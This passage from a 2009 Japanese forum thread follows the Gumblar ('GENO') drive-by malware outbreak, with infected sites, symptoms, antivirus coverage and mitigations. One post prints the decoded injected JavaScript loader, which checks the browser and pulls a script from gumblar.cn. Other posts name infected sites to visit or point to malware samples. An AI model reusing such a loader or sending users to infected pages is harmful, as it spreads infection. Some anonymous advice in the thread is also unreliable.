09/05/14 21:00:22
>>541
まじすか?
544:名無しさん@お腹いっぱい。
09/05/14 21:01:02
>>508
素直にPG2で設定しろよ。
545:名無しさん@お腹いっぱい。
09/05/14 21:02:17
>>532
なんか久しぶりだな。GENO社員乙w
546:名無しさん@お腹いっぱい。
09/05/14 21:06:01
・Googleの検索結果を改竄(リンクを弄る)
↑これどうやって確認すればいいの?
547:名無しさん@お腹いっぱい。
09/05/14 21:08:38
>>543
まだ詳しいことかいてないからわからないけど、一応貼っとくね
***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
スレリンク(news板:864番)
864 名前: キクザキイチゲ(中国地方)[sage] 投稿日:2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか?。
ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった(PCを購入して約2年一度も無かったのに、
一昨日から今日までに7回もフリーズ。)
あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、HDDを認識しないようになる
といった症状がでた。
一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。
報告されている症状と全く違うんですが、どうなんでしょ?。
548:名無しさん@お腹いっぱい。
09/05/14 21:11:54
>>546
アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。
549:名無しさん@お腹いっぱい。
09/05/14 21:19:11
>>548
面倒だなw
firefoxなんだけどWOT(Web of Trust)とか入れてもだめなのかな?
ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません
550:名無しさん@お腹いっぱい。
09/05/14 21:27:16
avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど
やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる
今カスペルスキーってとこでオンラインスキャンしてるが
このウイルスはどこに感染するんだ?32のチェックはもう終わったみたいだが
何も検出されなかったぞ?
全領域でやったら一件検出されたが何か勝手に止まったわ
551:名無しさん@お腹いっぱい。
09/05/14 21:29:10
ググれば一番上にくるからすぐ分かると思うけど「ライブハウス あさがやドラム」の
サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなw
552:名無しさん@お腹いっぱい。
09/05/14 21:29:54
>>550
感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ
553:名無しさん@お腹いっぱい。
09/05/14 21:32:09
>>550
新種が毎日出ててカスペも新種は当然スルー
554:名無しさん@お腹いっぱい。
09/05/14 21:32:22
>>552
代えのHDDがねえんだよっ!仕事ねえからさ・・・
555:名無しさん@お腹いっぱい。
09/05/14 21:35:39
Aviraは感知してくれる?
誤作動はないし、>>539でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・
556:名無しさん@お腹いっぱい。
09/05/14 21:36:23
>>551
感染してる
557:名無しさん@お腹いっぱい。
09/05/14 21:39:05
>>556
おおっ!!
ありがとう勇者様、一昨日は大丈夫だったらしいんだが・・・
なんか被害拡散してるなw
558:名無しさん@お腹いっぱい。
09/05/14 21:40:42
何れにしても中古の使い捨てPCでよかったよ。
559:名無しさん@お腹いっぱい。
09/05/14 21:40:51
これってプログラムが書き換えられるだけみたいだし
システムの復元とか使えないんだろか?
560:名無しさん@お腹いっぱい。
09/05/14 21:44:36
>>559
フルバックアップでもなければ無理だろ。
561:名無しさん@お腹いっぱい。
09/05/14 21:46:09
>>559
>システムの復元
それのほうが怖いよw
562:名無しさん@お腹いっぱい。
09/05/14 21:46:35
スレの伸び方が恐ろしい。
急に拡散した?
563:名無しさん@お腹いっぱい。
09/05/14 21:47:32
>>559
そんな無意味な事するくらいならインストールしなおすわ。
564:名無しさん@お腹いっぱい。
09/05/14 21:50:40
>>562
前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・
565:名無しさん@お腹いっぱい。
09/05/14 21:51:03
>>544
こんなのあるのか
thx
566:名無しさん@お腹いっぱい。
09/05/14 21:51:43
>>549
中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない?
567:名無しさん@お腹いっぱい。
09/05/14 21:56:18
PeerGuardian 2 for Windows β6b 日本語第2版
URLリンク(www.dukedog.flnet.org)
繋がらなくて落とせねぇ
568:名無しさん@お腹いっぱい。
09/05/14 21:57:36
>>566
だよね・・・
569:名無しさん@お腹いっぱい。
09/05/14 21:58:08
>>562
小林製薬(>>351)とネラーに利用者が多そうなSayMove!(>>282)の感染が発覚。
570:名無しさん@お腹いっぱい。
09/05/14 22:02:05
小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。
571:名無しさん@お腹いっぱい。
09/05/14 22:02:28
これはググルさんが公式に対策に乗り出したってこと?
Google Safe Browsing diagnostic page for gumblar.cn
URLリンク(google.com)
Gumblar hitting Googlers hard
URLリンク(www.daniweb.com)
Large amount of cross-site scripting attacks see websites compromised - SC Magazine UK
URLリンク(www.scmagazineuk.com)
572:名無しさん@お腹いっぱい。
09/05/14 22:02:29
潜在感染者が多そうだな。
573:名無しさん@お腹いっぱい。
09/05/14 22:03:35
>>568
てゆうかWeb of Trustでググッたこのサイトは大丈夫かな?
URLリンク(d.hatena.ne.jp)
なんかもうどのサイトも不安になってきたよ
できたらチェックお願いVISTAの方
574:名無しさん@お腹いっぱい。
09/05/14 22:11:47
>>573
俺XPなんで、対策してても怖くて踏めませんw
ところで>>129が繋がんないんだけど、俺だけ?
575:名無しさん@お腹いっぱい。
09/05/14 22:11:55
ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。
576:名無しさん@お腹いっぱい。
09/05/14 22:15:00
VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。
あとAcrobat Reader9.1でも感染するっけ?
577:名無しさん@お腹いっぱい。
09/05/14 22:19:20
>>576
>>551
578:名無しさん@お腹いっぱい。
09/05/14 22:20:23
感染してすぐ症状出るものですか?
579:名無しさん@お腹いっぱい。
09/05/14 22:20:33
フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど
特になにもおきない
580:名無しさん@お腹いっぱい。
09/05/14 22:21:25
(\.n 安全安心とっても快適な工夫もいっぱい windowsVISTA みんな買おうよ!
ヽ .ソ
| | ∧_∧
| | ∧_∧ _( ´∀`) ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
\ \( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) n
\ ⌒ ̄ヽ ./~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E)
∩. `、 ./ ̄| //`i / /| //`i / | ヽ ヽ/ /
. (7ヌ)| | (ミ ミ) | ∧__∧ | /(ミ ミ) |∧_∧| | | \__/
/ / ∧_∧ ∧_∧ _( ´∀`) ∧_∧ ∧_∧_(´∀` ) ∧_∧ ||
\ \( ´∀`)―--( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ ⌒ヽ(´∀` ) //
(\.n\ /⌒ ⌒ ̄ヽ /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒ /
ヽ .ソ | |ー、 / ̄| //`i / 、 /| //` i /
| | | | |∧_∧ / (ミ ミ) | | | /(ミ ミ) .| |
| | ∧_∧ _( ´∀`) ∧_∧ | ∧_∧___∧_∧ .|∧_∧ \ ∧_∧.|
\ \( ´∀` ) ̄ ⌒ヽ( ´∀` ) | ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) | . . n
\ ⌒ ̄ヽ . /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E)
∩. `、 ./ ̄| //`i / 、 /| //`i / | ヽ ヽ/ /
. (7ヌ)| | (ミ ミ) | ∧ ∧ | /(ミ ミ) |∧ ∧ | | | \__/
581:名無しさん@お腹いっぱい。
09/05/14 22:22:32
ポットウィルスなら駆除出来るけどこれは難しいのかなぁ
582:名無しさん@お腹いっぱい。
09/05/14 22:24:33
>>580
お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか?
583:名無しさん@お腹いっぱい。
09/05/14 22:25:51
>>567
オレも導入しようとしたが、日本語版とれないな・・・
584:名無しさん@お腹いっぱい。
09/05/14 22:26:21
>>579
>>102は?
585:名無しさん@お腹いっぱい。
09/05/14 22:28:19
aguseでは白だな。>あさがやドラム
586:名無しさん@お腹いっぱい。
09/05/14 22:28:25
質問です。
私、セキュリティソフトはソースネクストの ウィルスセキュリティZERO を使ってるのですが、
このセキュリティソフトはGENOウィルスに対応しているんでしょうか?
587:名無しさん@お腹いっぱい。
09/05/14 22:30:01
>>586
>>575
588:名無しさん@お腹いっぱい。
09/05/14 22:31:58
>>584
アドビ8.13にして全部踏んだけどなんともないわ
589:名無しさん@お腹いっぱい。
09/05/14 22:32:14
>>579
>>432のGoogle セーフ ブラウジングの結果で挙げられている幾つかのサイトはどうか。
590:名無しさん@お腹いっぱい。
09/05/14 22:33:16
>>579
そのサイトも侵されている
591:名無しさん@お腹いっぱい。
09/05/14 22:33:51
Adobe Reader・Acrobat に不正終了やコード実行の脆弱性―JPCERT/CC が注意喚起 - japan.internet.com Webテクノロジー
URLリンク(japan.internet.com)
本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
URLリンク(itpro.nikkeibp.co.jp)
こっちは関係あると思ったらなかった
592:名無しさん@お腹いっぱい。
09/05/14 22:36:15
もうなにがなんだかwwwww
593:名無しさん@お腹いっぱい。
09/05/14 22:45:36
どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ
594:名無しさん@お腹いっぱい。
09/05/14 22:50:36
ポッドウィルス駆除じゃこれは取りきれないか?
595:名無しさん@お腹いっぱい。
09/05/14 22:52:56
ポッドウィルスw
596:名無しさん@お腹いっぱい。
09/05/14 22:57:41
>>594
つ クリーンインストール
597:名無しさん@お腹いっぱい。
09/05/14 23:04:34
>>593
↓このスレから種を拾って直接実行すれば…。
【鑑定目的禁止】検出可否報告スレ10
スレリンク(sec板)
598:名無しさん@お腹いっぱい。
09/05/14 23:04:50
>>595
ごめん。ポットだったw
599:名無しさん@お腹いっぱい。
09/05/14 23:11:33
またかw
BIG-server.com binboserver.com メンテナンス / 障害報告
URLリンク(www.maido3.cc)
600:PG2
09/05/14 23:19:50
PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を
PG2のリスト追加にコピペすればいいのかな?
601:名無しさん@お腹いっぱい。
09/05/14 23:22:43
今北産業 現状のウイルス対策ソフトじゃ対応できないってマジ?
602:名無しさん@お腹いっぱい。
09/05/14 23:24:21
亜種がワラワラ出てきてるwww
対応おっつかねwww
603:名無しさん@お腹いっぱい。
09/05/14 23:25:56
Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん
わかりやすく載せとけよ
604:名無しさん@お腹いっぱい。
09/05/14 23:27:21
maidoの感染は、マァブが原因らしい
605:名無しさん@お腹いっぱい。
09/05/14 23:28:45
具体的に被害が出てるのはOS関連ファイル?
普通のファイルにも感染する?
606:名無しさん@お腹いっぱい。
09/05/14 23:29:00
ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。
607:名無しさん@お腹いっぱい。
09/05/14 23:30:37
対策
* WindowsUpdate
* PDFリーダーを最新にする (AdobeReader や Foxit Reader)
* AdobeFlashを最新にする
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
* Javascriptを切る
* 貼られている怪しいリンクをむやみに開かない
* ウイルス定義ファイルを更新する
↑これの
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
はfirefoxのアドオンで対応できますか?
608:名無しさん@お腹いっぱい。
09/05/14 23:33:05
>>567 >>583 こちらへ
PeerGuardian 33
スレリンク(download板)
609:名無しさん@お腹いっぱい。
09/05/14 23:34:41
>>607
アンチウイルスのFWに設定したほういいと思う
610:名無しさん@お腹いっぱい。
09/05/14 23:36:08
Javascript切ると見れなくなるサイトいっぱいあるじゃん
不便すぎる
611:名無しさん@お腹いっぱい。
09/05/14 23:38:23
adobe関係をアンインストールしときゃなんとかなる?
WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー
強化の為にはまあ必要なことだ。
612:名無しさん@お腹いっぱい。
09/05/14 23:38:59
>>608
ありがとう。スレあったのね。いってきマース
613:名無しさん@お腹いっぱい。
09/05/14 23:41:45
>>609
ウイルスバスターだけど、設定画面みても分からんなw
ひょっとしてできないのかしら・・・
614:名無しさん@お腹いっぱい。
09/05/14 23:54:57
>>613
暇だから調べてみた
URLリンク(virus.bind-web.net)
この辺参考にならん?
615:名無しさん@お腹いっぱい。
09/05/14 23:55:30
>>613
例外ルール(プロトコル)でぐぐれ
616:名無しさん@お腹いっぱい。
09/05/15 00:03:13
>あさがやドラム
解読してみた。
(function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;");
document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g);
真っ黒でつ。
617:名無しさん@お腹いっぱい。
09/05/15 00:06:57
ドクオが混じってるかと思ったら別もんか
("A")
618:名無しさん@お腹いっぱい。
09/05/15 00:09:02
/gumblar.cn・・・
619:名無しさん@お腹いっぱい。
09/05/15 00:12:07
でもこれで感染したサイトへの電凸が容易になったんじゃない?
「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし
(誰もが知っている)大手のサイトだから信用もしてもらいやすくなったはず
620:名無しさん@お腹いっぱい。
09/05/15 00:25:36
>>617
こっちは泣いてるおにゃのこっぽいな> (/_/g);
621:名無しさん@お腹いっぱい。
09/05/15 00:30:32
メガネメガネ ("A" )))....
622:名無しさん@お腹いっぱい。
09/05/15 00:33:44
b "j;")
623:名無しさん@お腹いっぱい。
09/05/15 00:35:38
大山鳴動して鼠一匹
624:名無しさん@お腹いっぱい。
09/05/15 00:40:38
ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ?
で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」
…
625:名無しさん@お腹いっぱい。
09/05/15 00:43:30
どういうこともなにも感染してたんだろう
お兄ちゃんがわかってくれるか心配だね
626:名無しさん@お腹いっぱい。
09/05/15 00:45:01
弟なのか妹なのか
627:名無しさん@お腹いっぱい。
09/05/15 00:45:48
しかし…
この脅威に世間は知らん振りか。
628:名無しさん@お腹いっぱい。
09/05/15 00:50:17
>>624
w
629:名無しさん@お腹いっぱい。
09/05/15 00:51:41
abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか?
630:名無しさん@お腹いっぱい。
09/05/15 00:54:24
>>629
最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。
631:名無しさん@お腹いっぱい。
09/05/15 00:56:05
>>601
事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた
632:名無しさん@お腹いっぱい。
09/05/15 01:04:26
aguse.jpってカスペなの?
633:名無しさん@お腹いっぱい。
09/05/15 01:06:27
>>631
それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。
634:名無しさん@お腹いっぱい。
09/05/15 01:11:38
aviraはどうなの?ちゃんと対応してる?
635:名無しさん@お腹いっぱい。
09/05/15 01:14:07
sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの?
636:名無しさん@お腹いっぱい。
09/05/15 01:14:20
>>634
スレリンク(sec板:862番)
自分で解凍してスキャンかけて確かめろ
637:名無しさん@お腹いっぱい。
09/05/15 01:15:15
ここでも調べられます。 URLリンク(www.gred.jp)
638:名無しさん@お腹いっぱい。
09/05/15 01:17:15
>>634
gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。
639:名無しさん@お腹いっぱい。
09/05/15 01:19:31
国を指定して全てブロック出来れば良いのにね。出来るのかな?日本と米国以外行かないし。
640:名無しさん@お腹いっぱい。
09/05/15 01:28:43
うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた…
IEだったら死んでたな
641:名無しさん@お腹いっぱい。
09/05/15 01:29:15
GENOウイルスってHDも破損するんだろうか?
なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…
642:名無しさん@お腹いっぱい。
09/05/15 01:33:34
ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で
IE6にて、あさがやドラム のURLを開くと 「危険なサイト アドレス http://gumblar.cn/rss/?id=568835」とメッセージが出た
643:名無しさん@お腹いっぱい。
09/05/15 01:36:45
UnderForge of Lack ≫ Zlkon, Gumblar 問題に関して
URLリンク(www3.atword.jp)
%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
644:名無しさん@お腹いっぱい。
09/05/15 01:39:56
gumblarに感染してたサイトのお詫び文が、
ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、
avastユーザからの指摘がウザイので一応アップし直します
のように書いてあってなんだか悔しくなった
感染してもはっきり分からないから世間の感覚はこんなもんか
645:名無しさん@お腹いっぱい。
09/05/15 01:40:18
初心なことかもしれないけど
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
を制限するさいtcpとudpどっちなの?
646:名無しさん@お腹いっぱい。
09/05/15 01:42:21
アップし直すだけじゃ無駄なのにな
647:名無しさん@お腹いっぱい。
09/05/15 01:44:33
>>643
これ、次スレのテンプレに入れた方が良いんじゃね?
648:642
09/05/15 01:45:41
>>644
ウイルスバスターでもブロックはできているみたいだ
649:644
09/05/15 01:48:40
>>648
おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから
650:名無しさん@お腹いっぱい。
09/05/15 01:48:58
>>645
TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね
651:642
09/05/15 01:53:32
>>649
ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ
652:名無しさん@お腹いっぱい。
09/05/15 01:56:32
久しぶりに踏んでみたがリファラをチェックするようになったんだな
リファラ切ってるとpdfもswfも読み込まれない
653:名無しさん@お腹いっぱい。
09/05/15 01:56:41
>>650
おk
ありがとう
654:名無しさん@お腹いっぱい。
09/05/15 01:57:19
>>645
どちらかを制限しない理由があるのか?
655:名無しさん@お腹いっぱい。
09/05/15 02:01:07
すっげーやばそうなウイルスなのに
あまり騒がれていないのは気のせいなの?
656:名無しさん@お腹いっぱい。
09/05/15 02:01:22
>>644
パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。
657:名無しさん@お腹いっぱい。
09/05/15 02:02:26
>>641
運が悪いと壊れるかもしれないけど切断とHDD関係なくね?
658:名無しさん@お腹いっぱい。
09/05/15 02:02:41
パスワード変えても無駄
659:名無しさん@お腹いっぱい。
09/05/15 02:05:20
管理者のPCのOSをクリーンインスコして、パスワードを変える。
660:名無しさん@お腹いっぱい。
09/05/15 02:06:19
バスターはフィルタリング機能があるから
URLブラックリストに登録されれば遮断してくれるということか
661:名無しさん@お腹いっぱい。
09/05/15 02:06:28
URLリンク(jvnrss.ise.chuo-u.ac.jp)
URLリンク(detail.chiebukuro.yahoo.co.jp)
URLリンク(excomp.cocolog-nifty.com)
URLリンク(puppet.asablo.jp)
URLリンク(dxd8.com)
URLリンク(ilion.blog.shinobi.jp)
662:名無しさん@お腹いっぱい。
09/05/15 02:08:20
>>655
気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・
663:名無しさん@お腹いっぱい。
09/05/15 02:08:31
URLリンク(blogs.yahoo.co.jp)
URLリンク(excomp.cocolog-nifty.com)
告知情報はこんなもんか?
豚インフルの比じゃねえ はんぱねえ感染力!
664:名無しさん@お腹いっぱい。
09/05/15 02:11:16
GENOは結局どこからこのウイルス持ってきたんだろ。
665:名無しさん@お腹いっぱい。
09/05/15 02:11:38
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
666:名無しさん@お腹いっぱい。
09/05/15 02:12:32
>>662
動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ
667:名無しさん@お腹いっぱい。
09/05/15 02:13:33
>>665
Gumblarさん、マジパネェっす!
668:名無しさん@お腹いっぱい。
09/05/15 02:15:49
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
669:名無しさん@お腹いっぱい。
09/05/15 02:16:31
俺は考えるのをやめた
670:名無しさん@お腹いっぱい。
09/05/15 02:19:18
>>666
だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・
671:名無しさん@お腹いっぱい。
09/05/15 02:33:38
>>508
参考にしてみた
thx
672:名無しさん@お腹いっぱい。
09/05/15 02:34:21
GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな
・JavaScriptオフ
GENOの例を見る限り改竄はリモートから行われている。
今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。
この場合JSオフでの対応は不可能。
・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う
攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。
最悪の場合ゼロデイを狙われる可能性もある。
・IE以外のブラウザを使う
Adobe関連の脆弱性はブラウザに依存しない。
・IPまたはドメインでブロック
攻撃コードを更新していくらでも別のサーバに振り向けることが可能。
・アンチウィルスでの対応
攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。
673:名無しさん@お腹いっぱい。
09/05/15 02:35:18
>>666
readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい(ニコ動は警告出してたような)
readerの方はアップデートしない人多いだろうなあ
674:名無しさん@お腹いっぱい。
09/05/15 02:39:38
GENOにかかるとネットに繋がる時間が長くなるってほんと?
Googleに全然つながらないんだが
675:名無しさん@お腹いっぱい。
09/05/15 02:42:26
Flash Playerを無効にしたらどう?
IEだと切り替え大変だけれど
676:名無しさん@お腹いっぱい。
09/05/15 02:48:20
ネットのインフルエンザはパンデミックだな
てか無自覚で感染してるPC多いんじゃないか?
677:名無しさん@お腹いっぱい。
09/05/15 02:49:11
何か感染したと思ったんだけど
いろんなチェックしてたらIE落ちなくなったわ
でもゲームが反応無しになる、なんだこれ
678:名無しさん@お腹いっぱい。
09/05/15 02:49:27
はんぱねえ
679:名無しさん@お腹いっぱい。
09/05/15 02:51:31
何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの?
680:名無しさん@お腹いっぱい。
09/05/15 02:58:19
WinMeなんですが、GENOウイルスに感染する危険はありますか?
XPはヤバイと聞きますが・・・
681:名無しさん@お腹いっぱい。
09/05/15 02:59:24
Meの情報ないね どうなの?
682:名無しさん@お腹いっぱい。
09/05/15 03:03:17
これが後に語り継がれるMe最強伝説の始まりである。
683:名無しさん@お腹いっぱい。
09/05/15 03:03:27
親父が頑なにjavaオンのIEを使いたがる
切り替えが楽なプニルや火狐も入れといて説明したのに
684:名無しさん@お腹いっぱい。
09/05/15 03:07:07
>>672
ジャバスクいつも切っていて火狐でネトサフしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染0だったがブートスキャンも
しといたほうがいいかな?
685:名無しさん@お腹いっぱい。
09/05/15 03:09:05
JavaScriptオフでも感染!?
686:名無しさん@お腹いっぱい。
09/05/15 03:12:06
>>684
俺、avastでチェストに隔離できなかったんだけど大丈夫かな?
687:名無しさん@お腹いっぱい。
09/05/15 03:17:39
豚どころじゃねえぞ おい
688:名無しさん@お腹いっぱい。
09/05/15 03:18:59
これ対策でAdobe Readerを9に入れ替えたけど、
実は6.0.6を使ってた方が安全だったりする?w
689:名無しさん@お腹いっぱい。
09/05/15 03:19:38
オフにして感染されちゃどうしようもないなぁ
690:名無しさん@お腹いっぱい。
09/05/15 03:23:02
>>684
JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。
691:名無しさん@お腹いっぱい。
09/05/15 03:24:17
はやい話でIEが狙われているのですか?
692:名無しさん@お腹いっぱい。
09/05/15 03:25:25
>>686
他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおkで終わった
今日のは右下に三つくらい説明が出てクリックしたらおkが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た
因みにフラッシュは最新版だがリーダーは7
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない
693:名無しさん@お腹いっぱい。
09/05/15 03:27:23
>>691
はやい話でそういうこと
しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ
694:名無しさん@お腹いっぱい。
09/05/15 03:32:29
>>692
俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにIEを閉じたんだよ
で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね
んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・
これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな?
チェストに移動できなかったのは、すぐにブラウザを閉じたから?
695:名無しさん@お腹いっぱい。
09/05/15 03:32:58
感染サイトにアクセスしてしまったよ
Avastがブロックしてくれたよ ママン…
いったいこのウイルスは
どのくらいの規模なのですか?
696:名無しさん@お腹いっぱい。
09/05/15 03:33:19
>>695
チェストに移動できた?
697:名無しさん@お腹いっぱい。
09/05/15 03:34:15
>>690
怖くてソース覗きに行く勇気ありませんw
二回ともジャバスクきった状態で警告された
隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった
698:名無しさん@お腹いっぱい。
09/05/15 03:37:13
さっき知って飛んできました
みごとに感染してました オワタ
699:名無しさん@お腹いっぱい。
09/05/15 03:38:14
感染したらどうすればいいですか?
700:名無しさん@お腹いっぱい。
09/05/15 03:38:22
感染しているか、していないか確認する方法ってありますかね?
701:名無しさん@お腹いっぱい。
09/05/15 03:40:52
>>700
>>665にあります
感染したらインストールし直すしかないのでしょうか?
702:名無しさん@お腹いっぱい。
09/05/15 03:42:53
>>699
ご愁傷さま
PCのOSクリーンインスコ入れ替えれ
703:名無しさん@お腹いっぱい。
09/05/15 03:43:36
>>697
ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め
704:名無しさん@お腹いっぱい。
09/05/15 03:44:03
Avastが活躍する話が多いな
Aviraから乗り換えようか悩む
705:名無しさん@お腹いっぱい。
09/05/15 03:44:07
キャッシュはこれか?
URLリンク(support.mozilla.com)のキャッシュファイルがウイルスに感染した
706:名無しさん@お腹いっぱい。
09/05/15 03:45:43
スレを見返したり、まとめ見たり、ググったりすればすぐわかることだと思うけど、
クリーンインストール以外の解決策は今のところないよ
707:名無しさん@お腹いっぱい。
09/05/15 03:46:34
あの今日一日で3つも感染しているホームページを開いてしまいました
TVはインフルエンザよりもこっちを報道するべきじゃないですか
708:名無しさん@お腹いっぱい。
09/05/15 03:50:16
>>701
Meの場合は、どのファイルを見ればいいですか?
709:名無しさん@お腹いっぱい。
09/05/15 03:53:32
Meまだ使ってる人多いのかな?
感染報告ないよね。気になるなぁ
710:名無しさん@お腹いっぱい。
09/05/15 03:55:10
Me使っているくらいなら
感染していても無自覚なんじゃないか?
711:名無しさん@お腹いっぱい。
09/05/15 03:55:24
>>698
何で調べたの?
712:名無しさん@お腹いっぱい。
09/05/15 03:56:01
firefoxの話題が多いようだからさっきfirefox導入して
ieのお気に入りをfirefoxにインポートしたんだけど
そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい
